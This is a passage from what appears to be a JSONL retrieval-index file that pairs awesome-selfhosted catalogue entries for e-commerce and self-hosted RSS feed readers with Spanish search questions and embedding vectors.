-0.01548, -0.00135, -0.01973, 0.06397, 0.01446, -0.00325, -0.08119, 0.00649, -0.00184, -0.04662, -0.09132, 0.06221, -0.03896, -0.08242, 0.06141, 0.01841, -0.02149, 0.0337, -0.04312, 0.03238, -0.00803, -0.01958, -0.00892, -0.0345, -0.0181, 0.0009, -0.01539, 0.01904, 0.04098, 0.00997, 0.0685, 0.00658, 0.0261, -0.032, -0.04071, 0.0126, -0.00425, 0.01154, -0.06053, -0.02885, -0.07072, -0.00931, -0.02858, 0.04288, -0.02099, -0.02422, 0.03714, 0.01585, 0.07091, 0.00536, 0.02992, -0.04233, -0.02371, -0.04347, 0.01838, -0.09489, -0.06634, -0.03333, -0.00531, 0.00363, -0.01684, -0.03158, 0.01701]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: WooCommerce β€” WordPress based e-commerce solution [GPL-3.0, PHP].", "indexar": "cual es la mejor opciΓ³n gratuita para vender cosas en internet", "v": [-0.04851, 0.13308, -0.12646, 0.00414, -0.11306, -0.06999, -0.00528, -0.07272, -0.16551, -0.18168, 0.0167, -0.24601, 0.08087, -0.02831, 0.05474, 0.00324, 0.08369, -0.10089, 0.27392, -0.02244, -0.00642, 0.00457, -0.06112, -0.12977, -0.12906, -0.01379, -0.0039, 0.0145, -0.09784, 0.18003, 0.00179, -0.1184, 0.05149, -0.05079, -0.06806, -0.04363, 0.05372, 0.14319, 0.11787, -0.04152, 0.13957, 0.04773, -0.01705, -0.00119, 0.08005, 0.02216, -0.01144, -0.01052, -0.03257, -0.04962, 0.03606, -0.07851, -0.11021, -0.0698, 0.06628, 0.02281, 0.07456, -0.11614, 0.07702, -0.05187, -0.03789, 0.07304, -0.03165, -0.04144, -0.0249, 0.0542, -0.07668, 0.0195, 0.01574, 0.04545, 0.07179, 0.04484, 0.01974, 0.00508, 0.01755, 0.08387, 0.027, 0.05289, 0.01399, -0.0044, 0.05406, -0.06198, -0.0047, 0.10271, -0.06868, -0.06405, -0.07041, -0.11016, 0.03883, -0.03206, 0.04536, 0.03668, -0.00629, -0.06082, -0.0009, -0.07864, 0.05214, -0.05445, -0.01633, 0.01639, -0.00196, 0.06795, -0.11451, 0.06934, -0.05666, -0.0163, 0.01646, 0.0316, -0.1012, -0.06899, -0.01743, -0.0502, -0.05761, -0.02771, -0.00496, -0.10666, 0.01645, -0.02895, -0.01155, 0.05985, -0.0459, -0.02031, 0.02352, -0.04666, 0.04872, 0.12358, 0.04122, 0.04808, -0.03709, 0.01956, 0.03813, -0.02809, 0.02168, -0.11201, -0.04752, -0.03977, 0.07224, -0.07941, 0.01384, -0.07028, 0.04226, -0.09901, -0.12629, 0.00568, 0.03445, -0.02199, 0.04957, -0.00094, -0.05144, -0.02007, -0.00852, 0.04262, 0.01004, 0.04784, 0.03937, 0.03724, -0.05786, -0.03243, 0.02346, 0.05374, -0.00323, 0.02211, 0.05476, -0.02299, -0.06123, 0.04429, -0.09323, 0.07696, -0.04526, -0.03297, -0.01387, 0.0027, -0.01326, -0.05649, -0.04561, -0.01643, -0.05012, 0.05402, 0.02211, -0.02964, 0.0239, -0.03044, -0.03514, 0.01074, -0.05962, 0.0093, -0.03615, 0.01708, -0.04727, -0.01112, -0.01912, -0.05809, -0.0603, 0.05794, 0.09532, -0.04434, -0.04897, -0.0835, 0.04613, 0.02579, -0.11501, -0.06006, 0.00947, 0.00531, -0.04629, -0.02941, 0.04689, -0.02674, -0.04267, 0.04259, -0.04458, -0.04726, 0.01491, -0.10379, -0.05321, 0.01125, 0.04196, -0.07874, -0.03028, 0.00664, 0.05698, -0.00021, 0.02556, -0.02792, 0.05059, 0.06262, 0.02555, 0.01093, -0.02351, 0.03031, -0.03168, -0.00016, 0.00652, -0.06707, 0.00176, -0.01634, 0.04237, -0.00584, -0.06755, 0.01683, -0.0425, 0.06601, 0.01143, -0.0144, 0.06301, -0.05735, -0.0787, -0.00898, -0.02449, -0.06179, -0.06899, -0.0239, 0.00206, 0.01607, 0.03295, 0.04375]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Bubo Reader β€” Irrationally minimal RSS feed reader [MIT, Nodejs]. CommaFeed β€” Google Reader inspired self-hosted RSS reader [Apache-2.0, Java/Docker]. Feeds Fun β€” News reader with tags, scoring, and AI [BSD-3-Clause, Python]. FreshRSS β€” Self-hostable RSS feed aggregator [AGPL-3.0, PHP/Docker]. Fusion β€” Lightweight RSS aggregator and reader [MIT, Go/Docker]. Goeland β€” Turns any RSS/Atom feed into a beautiful email digest [MIT, Go/Docker]. JARR β€” JARR (Just Another RSS Reader) is a web-based news aggregator and reader (fork of Newspipe) [AGPL-3.0, Docker/Python]. Kriss Feed β€” Simple and smart (or stupid) feed reader [CC0-1.0, PHP]. Leed β€” Leed (for Light Feed) is a Free and minimalist RSS aggregator [AGPL-3.0, PHP]. Miniflux β€” Minimalist news reader [Apache-2.0, Go/deb/Docker]. NewsBlur β€” Personal news reader that brings people together to talk about the world. A new sound of an old instrument [MIT, Python]. Newspipe β€” Web news reader [AGPL-3.0, Python].", "indexar": "con quΓ© programa puedo leer feeds RSS de forma minimalista?", "v": [0.05317, 0.01084, -0.01485, -0.15794, 0.00156, -0.03942, -0.14924, 0.01201, -0.1284, -0.04393, -0.03698, -0.11508, 0.1436, -0.10598, 0.09794, -0.02966, 0.04657, 0.06887, -0.00328, -0.07684, 0.00605, -0.11115, -0.12236, -0.04458, -0.00069, -0.02448, 0.14153, -0.00786, -0.04794, 0.00637, -0.06878, 0.06299, -0.01459, -0.03166, -0.19233, 0.14762, 0.04083, 0.07656, -0.10774, -0.0509, -0.0232, 0.07996, 0.10435, 0.01923, -0.0585, -0.05499, 0.0221, 0.01283, -0.01757, 0.00641, 0.01583, 0.03597, 0.02669, 0.07017, -0.01591, -0.06963, -0.02023, -0.25959, -0.06426, 0.09652, -0.02256, 0.15536, -0.00115, -0.13103, -0.04838, -0.03144, 0.07822, 0.02766, -0.02804, 0.00657, -0.02553, -0.10113, -0.00713, 0.01363, 0.00185, 0.1153, -0.05804, 0.06602, 0.03574, 0.06579, 0.00303, -0.13749, -0.00314, 0.0231, 0.02494, 0.06807, -0.06532, 0.00132, -0.10666, 0.01961, -0.00981, 0.1176, -0.00752, 0.0099, -0.0248, -0.03682, 0.01213, -0.00689, -0.06944, -0.01183, -0.05676, -0.08189, -0.16579, 0.06093, 0.03542, -0.01747, 0.09477, -0.0301, -0.02229, 0.08169, 0.01239, -0.01874, -0.07815, -0.06719, -0.00116, 0.03196, -0.078, -0.08572, -0.02496, -0.09317, -0.06731, 0.10266, -0.13334, 0.06208, 0.14173, 0.05457, 0.00641, 0.06553, -0.03314, 0.06048, 0.02784, 0.07526, -0.04252, 0.01697, -0.00364, -0.06775, 0.02767, 0.03516, -0.00786, -0.01999, -0.02852, 0.0649, 0.09665, 0.03165, 0.04678, -0.07859, 0.01549, -0.05657, -0.06313, 0.00214, -0.03565, 0.01705, 0.01211, -0.04959, -0.08191, -0.06862, 0.00816, -0.01682, -0.01752, 0.06911, -0.06963, 0.06963, -0.02167, -0.0623, 0.00953, -0.14106, 0.10672, 0.03422, 0.01999, 0.11992, -0.02447, 0.02357, 0.00014, -0.00507, -0.01958, -0.0175, -0.04887, -0.04475, 0.07946, 0.05699, -0.05082, 0.06696, 0.02145, 0.06381, -0.006, -0.04432, -0.05749, 0.05445, -0.00827, 0.00496, 0.02028, 0.02388, 0.00279, -0.07656, 0.04592, 0.05029, 0.03629, 0.0263, 0.02722, -0.05206, -0.06964, 0.01625, 0.08099, -0.01198, 0.03458, 0.04615, 0.02324, 0.03322, -0.0252, 0.12498, 0.06, -0.02494, -0.00011, -0.01824, -0.01581, 0.00529, -0.00701, 0.01219, 0.05201, 0.0644, 0.00067, -0.05004, 0.04448, 0.00776, 0.00582, -0.1107, -0.02745, 0.03296, -0.01665, 0.04354, 0.01032, -0.04679, 0.00548, 0.03388, 0.00124, -0.02124, -0.04053, 0.03808, -0.01881, -0.04796, -0.0358, 0.03739, 0.0658, 0.00363, 0.02547, -0.01669, -0.05612, -0.0047, -0.02241, -0.0016, 0.00757, 0.01668, 0.00485, -0.08697, 0.03392, 0.0608]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Bubo Reader β€” Irrationally minimal RSS feed reader [MIT, Nodejs]. CommaFeed β€” Google Reader inspired self-hosted RSS reader [Apache-2.0, Java/Docker]. Feeds Fun β€” News reader with tags, scoring, and AI [BSD-3-Clause, Python]. FreshRSS β€” Self-hostable RSS feed aggregator [AGPL-3.0, PHP/Docker]. Fusion β€” Lightweight RSS aggregator and reader [MIT, Go/Docker]. Goeland β€” Turns any RSS/Atom feed into a beautiful email digest [MIT, Go/Docker]. JARR β€” JARR (Just Another RSS Reader) is a web-based news aggregator and reader (fork of Newspipe) [AGPL-3.0, Docker/Python]. Kriss Feed β€” Simple and smart (or stupid) feed reader [CC0-1.0, PHP]. Leed β€” Leed (for Light Feed) is a Free and minimalist RSS aggregator [AGPL-3.0, PHP]. Miniflux β€” Minimalist news reader [Apache-2.0, Go/deb/Docker]. NewsBlur β€” Personal news reader that brings people together to talk about the world. A new sound of an old instrument [MIT, Python]. Newspipe β€” Web news reader [AGPL-3.0, Python].", "indexar": "quΓ© alternativa gratuita a Google Reader hay que sea fΓ‘cil de instalar?", "v": [-0.04293, 0.13392, -0.13142, -0.11237, -0.01757, -0.03241, -0.05304, -0.00813, -0.14661, -0.04376, -0.09954, -0.10759, -0.05232, -0.05764, 0.15861, -0.04221, 0.04045, -0.07594, 0.03961, -0.03586, -0.02594, 0.00137, -0.08931, -0.12632, -0.04272, 0.00295, -0.05838, -0.06007, -0.00634, 0.00834, 0.05568, -0.01142, -0.08145, -0.00528, -0.28037, 0.06445, 0.11262, 0.00314, 0.04572, -0.07362, 0.02324, -0.00251, -0.03871, 0.13991, -0.10867, -0.02563, 0.02389, -0.00876, -0.04261, -0.03329, -0.02435, 0.00296, -0.06836, -0.01066, 0.09208, 0.06285, 0.15575, -0.13047, -0.08064, -0.05303, -0.11473, 0.15781, 0.02251, 0.10409, 0.05825, 0.06784, 0.04437, 0.11543, -0.09405, 0.01451, 0.00632, -0.05316, 0.00891, -0.00455, -0.00767, 0.14759, -0.05876, -0.04429, 0.03856, 0.07786, 0.16203, -0.07972, -0.00123, -0.07052, -0.05078, -0.08433, -0.00334, -0.11035, 0.02224, -0.04068, 0.01019, 0.03008, 0.02622, 0.10279, -0.00313, -0.06524, 0.16315, -0.12063, -0.05841, 0.06962, 0.1105, -0.02639, 0.03171, 0.03869, -0.0036, -0.1034, -0.09833, -0.04684, -0.03652, -0.04141, -0.01302, 0.0242, -0.0074, -0.01645, 0.03356, -0.03407, 0.00776, -0.00507, -0.08044, 0.01427, -0.13225, -0.01459, -0.13713, 0.01054, 0.01004, 0.07774, 0.04841, 0.06502, -0.00968, -0.01161, 0.05144, -0.10325, -0.00536, -0.0277, -0.12338, 0.04201, 0.03603, -0.10881, -0.05365, 0.00041, -0.02118, -0.00955, 0.00045, -0.06624, -0.03482, -0.06089, 0.05607, 0.02026, -0.05194, -0.10617, -0.0519, -0.01933, -0.04463, 0.10143, -0.00306, 0.01268, 0.00908, -0.05145, -0.00525, 0.04443, -0.01077, -0.05801, 0.03823, 0.01483, -0.05779, -0.04238, -0.01147, -0.02893, -0.00203, 0.0389, -0.03132, 0.09819, -0.00362, -0.07261, 0.07531, -0.00465, 0.05824, 0.0141, 0.04579, -0.00579, -0.06139, 0.05189, -0.00768, -0.02331, -0.08445, -0.08915, -0.06371, -0.035, 0.00804, 0.04821, 0.0117, 0.01799, -0.08661, 0.00928, 0.05914, -0.03552, -0.05279, -0.1165, -0.02558, -0.02811, -0.11046, 0.0092, -0.00419, -0.00158, 0.03097, -0.03911, 0.01972, 0.08177, -0.01583, 0.05927, 0.03734, 0.00659, -0.00156, -0.03667, 0.03249, -0.00242, 0.00569, -0.0156, 0.01697, 0.01556, 0.01797, -0.03771, 0.00975, 0.00755, -0.02409, -0.0083, 0.03679, 0.03046, -0.01068, 0.04902, 0.04131, 0.02034, 0.01094, 0.00565, 0.02071, -0.00098, 0.01689, 0.03698, 0.00075, -0.00167, 0.05304, 0.04513, -0.00742, 0.02614, -0.04842, -0.03688, -0.05046, 0.01663, -0.02611, -0.0335, -0.05551, 0.03318, 0.03024, -0.02257, 0.02429, 0.01677]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Bubo Reader β€” Irrationally minimal RSS feed reader [MIT, Nodejs]. CommaFeed β€” Google Reader inspired self-hosted RSS reader [Apache-2.0, Java/Docker]. Feeds Fun β€” News reader with tags, scoring, and AI [BSD-3-Clause, Python]. FreshRSS β€” Self-hostable RSS feed aggregator [AGPL-3.0, PHP/Docker]. Fusion β€” Lightweight RSS aggregator and reader [MIT, Go/Docker]. Goeland β€” Turns any RSS/Atom feed into a beautiful email digest [MIT, Go/Docker]. JARR β€” JARR (Just Another RSS Reader) is a web-based news aggregator and reader (fork of Newspipe) [AGPL-3.0, Docker/Python]. Kriss Feed β€” Simple and smart (or stupid) feed reader [CC0-1.0, PHP]. Leed β€” Leed (for Light Feed) is a Free and minimalist RSS aggregator [AGPL-3.0, PHP]. Miniflux β€” Minimalist news reader [Apache-2.0, Go/deb/Docker]. NewsBlur β€” Personal news reader that brings people together to talk about the world. A new sound of an old instrument [MIT, Python]. Newspipe β€” Web news reader [AGPL-3.0, Python].", "indexar": "cual es una herramienta para leer noticias y organizarlas con etiquetas?", "v": [-0.06167, 0.08379, -0.06102, -0.19058, 0.10695, -0.17808, -0.09553, 0.06896, -0.08128, -0.07285, -0.20632, -0.11363, 0.00654, -0.04187, 0.09382, 0.04475, 0.14104, -0.10249, -0.00496, -0.0135, -0.14308, 0.12477, -0.21207, 0.04586, -0.12458, -0.09843, 0.06391, 0.05343, -0.16656, 0.18078, -0.18127, 0.11291, 0.04754, -0.08591, -0.06854, 0.08164, 0.05585, 0.04045, -0.0994, 0.03853, -0.16321, 0.08297, -0.07928, 0.05147, 0.05966, -0.03106, -0.05521, 0.03833, 0.00195, 0.01794, -0.00677, -0.0559, -0.00866, 0.01239, -0.04728, -0.1151, 0.08352, -0.06355, -0.02725, -0.05671, -0.06416, -0.0156, -0.02902, 0.02688, 0.03654, 0.01906, -0.02942, -0.03608, -0.044, 0.02452, 0.01126, 0.00579, 0.03145, 0.04689, 0.0232, 0.05828, 0.0312, 0.06899, 0.03032, 0.10757, 0.10834, -0.0608, -0.11431, 0.10901, 0.04915, -0.08924, -0.00347, 0.0274, 0.02959, -0.06999, -0.04351, 0.09755, -0.03829, -0.05617, 0.0263, -0.01799, 0.13815, -0.05364, -0.03718, 0.02147, 0.03763, -0.12246, -0.03129, 0.04548, -0.08516, -0.06496, -0.10153, 0.04347, 0.02171, -0.00197, 0.02847, 0.04006, 0.0085, 0.0842, -0.01137, -0.00284, 0.06866, 0.01239, -0.00726, -0.06611, 0.06337, 0.07639, -0.08014, -0.0119, 0.0902, 0.0247, 0.053, 0.06895, -0.00683, -0.0489, 0.00224, -0.02905, -0.03539, 0.03337, -0.02697, -0.08188, -0.01272, -0.08628, -0.01217, -0.06732, -0.02824, 0.01705, -0.05809, -0.06621, 0.02908, -0.01717, 0.03226, 0.02645, -0.08746, 0.0509, 0.02942, -0.01314, 0.07277, 0.00438, -0.04503, 0.00584, -0.07145, -0.02172, -0.02748, -0.02295, -0.09116, -0.02985, 0.04548, -0.01775, 0.01814, -0.07798, 0.09864, 0.03502, -0.00837, 0.04149, 0.00051, 0.01431, 0.0274, 0.03723, -0.0216, -0.06954, -0.04681, -0.00476, 0.01927, -0.04644, 0.04862, 0.01164, -0.07268, 0.00717, 0.04255, -0.04867, 0.07179, 0.00254, -0.01022, 0.03586, 0.03398, 0.0065, 0.01526, -0.07899, 0.04, 0.00122, -0.02232, -0.0639, 0.01923, 0.00962, -0.03033, -0.02871, 0.00827, -0.02121, -0.00459, -0.00589, -0.0186, 0.00454, 0.00748, 0.05383, 0.0368, -0.01792, -0.02291, -0.03995, -0.071, 0.00085, -0.03437, 0.01223, 0.02909, 0.01214, 0.04333, 0.02199, 0.03524, -0.04363, -0.00301, 0.01124, -0.00221, 0.02875, -0.00205, 0.03, 0.0048, -0.022, 0.01529, 0.04913, -0.01752, -0.04138, 0.05613, -0.01246, -0.02583, 0.00049, -0.02748, 0.03535, 0.0008, 0.00246, -0.05798, -0.03005, -0.00312, 0.02693, -0.09233, -0.07577, 0.02857, 0.01257, 0.10045, -0.03278, 0.00511, -0.02639]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: reader β€” Feed reader web app and library (so you can use it to build your own), with only standard library and pure-Python dependencies [BSD-3-Clause, Python]. Readflow β€” Lightweight news reader with modern interface and features: full-text search, automatic categorization, archiving, offline support, notifications [AGPL-3.0, Go/Docker]. RSS-Bridge β€” Generate RSS/ATOM feeds for websites which don't have one [Unlicense, PHP/Docker]. RSS Monster β€” Easy to use web-based RSS aggregator and reader compatible with the Fever API (alternative to Google Reader) [MIT, PHP]. RSS2EMail β€” Fetches RSS/Atom-feeds and pushes new content to any email-receiver, supports OPML [GPL-2.0, Python/deb]. RSSHub β€” Easy to use, and extensible RSS feed aggregator capable of generating RSS feeds from pretty much everything ranging from social media to university departments [MIT, Nodejs/Docker]. Selfoss β€” New multipurpose rss reader, live stream, mashup, aggregation web application [GPL-3.0, PHP].", "indexar": "que programa me sirve para leer noticias directamente desde los feeds RSS sin tener que descargar nada?", "v": [-0.14867, 0.05633, -0.07884, -0.19271, 0.05481, -0.07669, -0.14385, 0.00103, -0.02911, -0.03559, -0.12274, -0.18095, 0.05508, -0.16282, 0.10677, -0.05146, 0.03829, 0.07524, 0.17975, -0.0488, 0.0347, -0.03, -0.0424, -0.14322, -0.06375, -0.02811, 0.0413, -0.00546, -0.11494, -0.02767, -0.01579, -0.02339, 0.05406, 0.00771, -0.16923, 0.17007, 0.05514, 0.01578, -0.09795, -0.0384, 0.00183, -0.00012, 0.01966, 0.05657, 0.01091, -0.08454, 0.0515, -0.00492, 0.00448, -0.04879, 0.04643, 0.04456, 0.0349, -0.02844, -0.16054, -0.04251, -0.01776, -0.19793, -0.09055, 0.02074, -0.0179, 0.10967, 0.01348, -0.13461, -0.04268, -0.04586, 0.1225, 0.03999, -0.09661, 0.00631, -0.03754, 0.01286, 0.07475, 0.03711, -0.07484, 0.01205, -0.02498, 0.06739, 0.004, 0.08903, 0.07307, -0.13595, 0.01965, 0.0517, 0.0372, 0.005, 0.01432, 0.04179, -0.03276, 0.00073, 0.00913, 0.12888, -0.04523, 0.01411, 0.03147, -0.07623, 0.05306, -0.03905, -0.00686, 0.00903, -0.04368, -0.11904, -0.01107, 0.022, 0.01934, -0.00292, 0.1059, -0.04897, 0.01958, 0.11514, 0.03301, 0.03095, 0.01457, -0.04555, -0.01153, 0.05707, -0.06237, -0.07663, -0.07286, -0.05397, -0.101, 0.04573, -0.07805, 0.04914, 0.03338, 0.0003, 0.04497, 0.01584, -0.06775, 0.09289, 0.02234, -0.01595, 0.00143, 0.01593, -0.03451, -0.16233, 0.0206, 0.02203, -0.05429, -0.05627, -0.00161, 0.08013, 0.02051, 0.06471, -0.00877, -0.03788, 0.01936, -0.06524, 0.00032, -0.0615, -0.03281, -0.03045, 0.00764, -0.03043, -0.04852, -0.04904, 0.04407, -0.05493, -0.05249, 0.06451, -0.09184, 0.03129, -0.01557, -0.08385, -0.04332, -0.11353, 0.03506, 0.03817, 0.07177, 0.14618, -0.0385, 0.06154, 0.01891, -0.07316, -0.01436, -0.00421, -0.00318, 0.00128, 0.08044, 0.0462, -0.08377, 0.03813, 0.03681, 0.06185, -0.02976, -0.03898, -0.02686, 0.06854, -0.05107, 0.0114, 0.02637, 0.02408, 0.00235, -0.05008, 0.05915, 0.05338, -0.03169, -0.0066, 0.01502, -0.05549, -0.09486, 0.00387, 0.04804, 0.03721, 0.04384, -0.00399, 0.08749, 0.004, -0.00549, 0.08983, 0.01115, 0.02969, 0.0123, -0.01317, 0.01644, -0.04975, 0.07908, 0.02932, 0.03119, 0.02873, -0.03878, -0.04533, 0.08083, 0.02144, -0.00236, -0.05262, -0.00633, 0.03426, 0.00358, 0.04255, -0.00497, 0.02121, 0.01997, 0.02654, -0.02063, -0.04058, -0.03778, 0.0828, -0.00597, -0.06887, -0.03047, 0.04672, 0.07147, -0.03256, -0.0275, -0.02618, -0.0367, -0.02931, -0.00512, -0.0087, -0.00448, -0.0057, 0.0465, -0.02798, 0.0277, 0.04973]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: reader β€” Feed reader web app and library (so you can use it to build your own), with only standard library and pure-Python dependencies [BSD-3-Clause, Python]. Readflow β€” Lightweight news reader with modern interface and features: full-text search, automatic categorization, archiving, offline support, notifications [AGPL-3.0, Go/Docker]. RSS-Bridge β€” Generate RSS/ATOM feeds for websites which don't have one [Unlicense, PHP/Docker]. RSS Monster β€” Easy to use web-based RSS aggregator and reader compatible with the Fever API (alternative to Google Reader) [MIT, PHP]. RSS2EMail β€” Fetches RSS/Atom-feeds and pushes new content to any email-receiver, supports OPML [GPL-2.0, Python/deb]. RSSHub β€” Easy to use, and extensible RSS feed aggregator capable of generating RSS feeds from pretty much everything ranging from social media to university departments [MIT, Nodejs/Docker]. Selfoss β€” New multipurpose rss reader, live stream, mashup, aggregation web application [GPL-3.0, PHP].", "indexar": "cual es una alternativa a Google Reader que funcione en el navegador y tenga buscador de texto completo?", "v": [0.00245, 0.02104, -0.15734, -0.07245, 0.01526, -0.06174, 0.04347, -0.04089, -0.03747, -0.11252, -0.06408, -0.10002, -0.04758, -0.01556, 0.11086, -0.01839, 0.12761, -0.07568, 0.04771, -0.0, -0.05032, -0.08369, -0.01273, -0.09203, -0.05018, -0.09593, -0.09077, -0.06568, -0.01555, -0.00479, -0.00587, -0.03443, 0.0172, -0.06392, -0.17787, 0.02785, 0.08222, 0.04491, -0.06746, -0.02198, 0.0137, 0.03434, -0.15518, 0.11487, -0.22732, -0.0062, 0.02178, -0.01491, -0.06977, -0.02703, -0.06206, 0.04041, -0.20038, 0.07063, -0.02924, 0.09917, 0.22687, -0.12856, 0.05123, -0.08403, -0.01776, 0.01546, 0.0035, -0.01965, 0.00554, 0.02039, 0.08592, 0.05496, -0.024, 0.00637, -0.05278, 0.07359, -0.06948, 0.02957, 0.01439, 0.17305, -0.02622, 0.01777, 0.05836, 0.08707, 0.14228, -0.03629, -0.1193, -0.01433, -0.06624, -0.12748, 0.05597, -0.10124, 0.03828, -0.03496, 0.03732, 0.04131, -0.03207, 0.09262, -0.07399, -0.05862, 0.1206, -0.11605, -0.00973, 0.02217, 0.13382, -0.02143, -0.02551, 0.04721, 0.05009, -0.06823, -0.04922, -0.03967, -0.02013, -0.00209, 0.02605, -0.04203, -0.05574, -0.05197, -0.00035, -0.00472, -0.08384, -0.0592, -0.03479, -0.11139, -0.18594, 0.05018, -0.15151, -0.02218, 0.07434, 0.09282, 0.02829, 0.01829, 0.05039, -0.04836, 0.07307, -0.04632, -0.09365, -0.07774, -0.04898, 0.06103, -0.01597, 0.01987, 0.01807, 0.03703, 0.01072, -0.02139, 0.04856, -0.0092, 0.07725, -0.03602, 0.0501, 0.02252, -0.04907, -0.10237, -0.07774, -0.03557, 0.00182, 0.05363, -0.02528, 0.0152, -0.06531, 0.01313, 0.0075, 0.07446, -0.0138, -0.02555, 0.03609, 0.02904, -0.02903, -0.00513, -0.06042, -0.062, 0.05441, -0.04701, -0.05919, 0.01326, 0.00245, -0.09615, 0.02037, 0.00312, -0.03432, 0.03093, 0.06179, 0.01789, -0.0389, 0.01003, -0.04528, 0.03065, -0.05472, -0.07672, 0.02459, -0.04269, -0.05042, -0.00254, 0.03551, 0.00963, -0.06411, 0.00826, 0.03702, 0.00034, -0.06155, -0.07386, 0.02498, -0.06621, -0.08227, -0.02371, -0.00283, 0.0074, -0.00116, -0.01607, 0.03567, -0.01169, 0.0124, 0.04832, 0.04643, -0.0238, 0.03628, 0.03278, -0.03815, -0.0481, 0.03105, -0.03279, 0.00663, 0.01645, 0.02815, -0.01486, 0.02363, 0.02882, 0.01706, -0.00623, 0.05033, 0.00433, -0.04907, 0.02862, -0.00126, -0.00956, -0.04334, 0.00582, 0.03282, 0.00824, 0.01844, 0.02083, -0.02933, -0.05023, 0.02861, 0.02893, -0.00972, 0.00587, -0.03586, -0.01947, -0.09622, 0.02337, -0.00428, -0.03985, -0.04699, 0.0193, 0.0486, -0.06757, 0.08996, -0.04414]} -{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: reader β€” Feed reader web app and library (so you can use it to build your own), with only standard library and pure-Python dependencies [BSD-3-Clause, Python]. Readflow β€” Lightweight news reader with modern interface and features: full-text search, automatic categorization, archiving, offline support, notifications [AGPL-3.0, Go/Docker]. RSS-Bridge β€” Generate RSS/ATOM feeds for websites which don't have one [Unlicense, PHP/Docker]. RSS Monster β€” Easy to use web-based RSS aggregator and reader compatible with the Fever API (alternative to Google Reader) [MIT, PHP]. RSS2EMail β€” Fetches RSS/Atom-feeds and pushes new content to any email-receiver, supports OPML [GPL-2.0, Python/deb]. RSSHub β€” Easy to use, and extensible RSS feed aggregator capable of generating RSS feeds from pretty much everything ranging from social media to university departments [MIT, Nodejs/Docker]. Selfoss β€” New multipurpose rss reader, live stream, mashup, aggregation web application [GPL-3.0, PHP].", "indexar": "como puedo generar feeds RSS para webs que no tienen uno para luego leerlos con algun lector?", "v": [-0.00455, -0.00801, -0.13789, 0.02035, -0.02287, -0.01607, -0.03961, 0.05728, -0.01724, -0.11685, -0.10728, -0.00724, 0.06638, -0.13185, 0.16859, -0.00497, 0.00859, 0.05191, 0.02087, -0.10914, -0.03321, 0.02037, -0.10288, -0.04749, 0.08224, -0.06601, 0.10688, -0.0911, -0.0046, 0.12369, -0.11613, 0.04186, -0.03719, 0.02269, -0.19131, 0.11683, 0.03009, 0.18541, -0.07367, 0.0763, 0.07027, 0.13988, -0.09639, -0.00255, -0.05161, -0.058, -0.08478, -0.08479, -0.0759, 0.02795, 0.05403, 0.0216, -0.0709, -0.01456, -0.14242, 0.00736, 0.15946, -0.13374, 0.00984, 0.03763, -0.06138, 0.15309, 0.03246, -0.15051, -0.09305, -0.03418, -0.06723, 0.05752, -0.03213, 0.00174, -0.08191, 0.0387, 0.05025, 0.08024, 0.03637, 0.08056, -0.06, 0.06146, 0.06662, 0.14312, -0.00548, -0.09792, -0.03079, 0.02503, 0.06171, 0.07231, -0.00366, -0.05427, -0.01481, 0.02699, 0.00866, 0.09092, -0.03796, -0.01726, -0.00972, -0.07936, 0.02469, -0.02755, -0.06331, 0.00599, -0.00075, -0.09514, -0.03311, 0.03949, 0.05737, -0.08928, 0.03231, -0.01223, 0.06149, 0.07562, 0.05223, 0.07684, -0.07482, -0.09593, -0.02741, 0.06267, -0.05767, -0.07069, 0.04699, -0.06185, -0.09973, 0.02949, -0.10968, 0.0159, 0.0145, 0.03354, 0.04205, -0.00483, 0.01392, -0.02726, -0.02016, -0.03605, -0.04664, -0.02677, -0.03207, -0.01377, 0.02473, -0.0268, -0.0761, 0.02376, -0.05057, 0.06184, 0.04054, 0.08766, -0.00355, -0.06305, -0.08966, -0.03372, -0.1353, -0.06852, -0.06975, 0.02338, -0.0065, -0.02923, -0.04748, -0.00414, 0.02992, -0.04946, 0.04038, 0.02045, -0.07755, 0.06532, 0.05415, -0.04507, -0.04816, -0.08525, -0.0581, -0.02799, 0.07927, 0.05196, -0.1119, 0.00347, -0.06458, -0.05709, 0.06484, -0.04492, -0.08438, 0.04455, 0.01268, 0.04237, -0.03957, -0.00114, -0.05603, 0.03765, -0.05672, -0.04237, 0.00969, -0.00899, -0.01923, 0.00846, 0.04528, 0.00819, 7e-05, -0.02169, 0.06913, 0.04769, -0.02048, -0.00974, 0.01761, -0.08543, -0.12279, 0.04714, 0.01363, 0.0456, 0.0148, -0.05189, -0.01408, 0.0598, -0.05578, 0.05336, 0.0987, 0.00918, -0.0017, -0.05196, -0.06395, -0.02574, -0.00062, -0.02929, -0.02742, 0.03608, 0.04556, -0.01941, 0.05475, -0.00106, 0.02677, -0.02808, 0.01286, 